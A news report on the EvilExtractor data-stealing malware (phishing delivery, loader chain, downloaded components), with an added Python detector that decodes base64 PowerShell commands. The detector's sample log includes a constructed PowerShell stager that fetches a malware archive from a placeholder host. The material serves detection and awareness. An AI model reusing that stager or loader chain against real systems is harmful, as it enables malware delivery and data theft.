
EvilExtractor malware activity spikes in Europe and the U.S.
2023-04-22 15:14

Researchers are seeing a rise in attacks spreading the EvilExtractor data theft tool, used to steal users' sensitive data in Europe and the U.S. EvilExtractor is sold by a company named Kodex for $59/month, featuring seven attack modules, including ransomware, credential extraction, and Windows Defender bypassing.

While marketed as a legitimate tool, BleepingComputer was told that EvilExtractor is primarily promoted to threat actors on hacking forums.

Based on attack statistics collected by the cybersecurity company, deployments of EvilExtractor spiked in March 2023, with most infections traced to a linked phishing campaign.

When the target opens the file delivered by the phishing email, a PyInstaller-packed executable runs and launches a .NET loader, which uses a base64-encoded PowerShell script to start the EvilExtractor executable.

The EvilExtractor data-stealing module will download three additional Python components named "KK2023.zip," "Confirm.zip," and "MnMs.zip."
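The base64-encoded PowerShell stage and the three component names above are the pieces a defender can look for in process-creation telemetry. The following is an added example, not code from the article or from any vendor: it decodes PowerShell `-EncodedCommand` arguments found in (constructed) command lines and flags any that reference the component names reported above. The assumption that the loader passes its script via `-EncodedCommand` is mine; the sample log lines and the download host are constructed placeholders.

```python
import base64
import re

# Stage-two component names taken from the write-up above; everything else here is constructed.
EVILEXTRACTOR_COMPONENTS = ("KK2023.zip", "Confirm.zip", "MnMs.zip")
# Common spellings of PowerShell's -EncodedCommand switch followed by a base64 blob.
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the script carried by an -EncodedCommand argument, or None if there is none."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # not real base64 (bad alphabet or padding): no payload
        return None
    # PowerShell expects UTF-16LE: ASCII text then has a NUL in every odd byte position.
    if len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")  # hand-rolled loaders often use UTF-8

def find_evilextractor_indicators(script):
    """List the EvilExtractor component names mentioned in a decoded script."""
    lowered = script.lower()
    return [name for name in EVILEXTRACTOR_COMPONENTS if name.lower() in lowered]

def scan_process_log(lines):
    """Return (command line, indicators) for each encoded command that names a component."""
    hits = []
    for line in lines:
        decoded = decode_encoded_command(line)
        if decoded is not None:
            indicators = find_evilextractor_indicators(decoded)
            if indicators:
                hits.append((line, indicators))
    return hits

def build_sample_log():
    """Constructed process-creation lines; the download host is a placeholder."""
    stager = "Invoke-WebRequest http://example.invalid/KK2023.zip; Expand-Archive Confirm.zip"
    benign = "Get-Date | Out-File C:\\logs\\heartbeat.txt"
    enc = lambda s: base64.b64encode(s.encode("utf-16-le")).decode("ascii")
    return [
        "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc " + enc(stager),
        "powershell.exe -EncodedCommand " + enc(benign),
        "powershell.exe -nop -w hidden -c Get-Process",
        "notepad.exe C:\\Users\\user\\notes.txt",
    ]
```

Running `scan_process_log(build_sample_log())` returns only the first constructed line, tagged with the two component names its decoded script mentions; the benign encoded command and the plain commands are ignored.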

In-the-wild detections indicate that EvilExtractor is gaining traction in the cybercrime community, so users are advised to remain vigilant against unsolicited emails.

News URL

https://www.bleepingcomputer.com/news/security/evilextractor-malware-activity-spikes-in-europe-and-the-us/